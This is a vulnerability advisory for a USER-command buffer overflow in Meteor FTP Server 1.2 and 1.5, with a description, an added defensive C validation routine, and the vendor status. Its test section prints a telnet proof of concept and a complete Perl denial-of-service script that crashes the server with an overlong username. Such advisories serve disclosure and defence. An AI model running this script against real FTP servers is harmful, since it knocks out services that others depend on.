Meteor FTP Server USER Command Memory Corruption Vulnerability

2008-04-10 03:04:15 Source: Internet

Published: 2003-08-08
Updated: 2005-05-25

Affected systems:
MeteorSoft Meteor FTP 1.2
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
MeteorSoft Meteor FTP 1.5
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
Description:
BUGTRAQ ID: 8376

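Meteor FTP is an FTP server program for Windows.

The USER command in Meteor FTP lacks sufficient buffer boundary checking. A remote attacker can exploit this vulnerability to cause a denial of service against the server, and carefully crafted string data may allow execution of arbitrary instructions on the system with the privileges of the FTP process.

Connecting to the Meteor FTP server and sending a USER command with an overly long string as its argument crashes the FTP service; carefully constructed username data may allow execution of arbitrary instructions on the system with the privileges of the FTP process.

If the PASS and PORT commands are issued with suitable arguments, the memory corruption may also lead to a buffer overflow.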
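
The missing check described above, seen from the server side, as an added example (not code from Meteor FTP or from the original advisory): a C handler that validates the USER argument against the number of bytes actually received before copying it. The function name `handle_user` and the 64-byte `USER_MAX` limit are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define USER_MAX 64 /* assumed policy limit, not taken from Meteor FTP */

/* Hypothetical handler for one control-channel line "USER <name>\r\n".
 * `len` is the number of bytes actually received, so nothing relies on
 * a terminating NUL. Returns the FTP reply code to send:
 *   331  name accepted and copied, NUL-terminated, into out
 *   500  not a well-formed USER command
 *   501  argument empty, too long, or containing non-printable bytes */
int handle_user(const char *line, size_t len, char *out, size_t out_size)
{
    static const char verb[] = "USER";
    size_t i, arg_len;

    if (line == NULL || out == NULL || out_size == 0)
        return 500;
    out[0] = '\0';

    /* Drop the trailing CRLF (or bare LF) before measuring anything. */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;

    /* The verb is case-insensitive and must be followed by one space. */
    if (len < sizeof(verb)) /* 4 letters plus the separator */
        return 500;
    for (i = 0; i < sizeof(verb) - 1; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return 500;
    if (line[4] != ' ')
        return 500;

    /* The length is checked against both the policy limit and the real
     * destination size before a single byte is copied. */
    arg_len = len - 5;
    if (arg_len == 0 || arg_len > USER_MAX || arg_len >= out_size)
        return 501;

    for (i = 0; i < arg_len; i++)
        if (!isprint((unsigned char)line[5 + i]))
            return 501;

    memcpy(out, line + 5, arg_len);
    out[arg_len] = '\0';
    return 331;
}
```

An overlong argument is answered with 501 and leaves `out` empty, so the session continues instead of the process crashing.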

<*Source: Zee (zerash@evicted.org)
Auston J (Anix44@gmail.com)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=106045414403076&w=2
*>

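Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Zee (zerash@evicted.org) provided the following test method: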

root@openwire # telnet 192.168.1.14 21
Trying 192.168.1.14...
Connected to 192.168.1.14.
Escape character is '^]'.
220 Service ready for new user
USER
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
530 Not logged on
QUIT
Connection closed by foreign host.

#!/usr/bin/perl
#
# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5
#
# A vulnerability has been identified in Meteor FTP Version 1.5, which
# allows malicious users to remotely crash the ftpd. By connecting to the
# ftpd and issuing USER followed by large amounts of data, the server
# crashes. For more info, go to :
# http://www.evicted.org/projects/writings/mftpadvisory.txt
#
# Usage : ./meteordos.pl <host/ip>
#
# Vulnerability & code by zerash
# Contact : zerash@evicted.org

use Net::FTP;
$host = $ARGV[0];

if("$ARGV[0]" eq "") {
print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n");
die("Usage : ./meteorftpdos <host\/ip>\n");
} else {

print("Connecting to $host...\n");
my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n";
print("Connected!\n");
print("Attempting to exploit the ftpd...");
$ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'); $ftp->quit;
print("Success!\n");
}

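Recommendation:
Vendor patch:

MeteorSoft
----------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to check the vendor's home page regularly for the latest version: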

http://66.235.19.241/
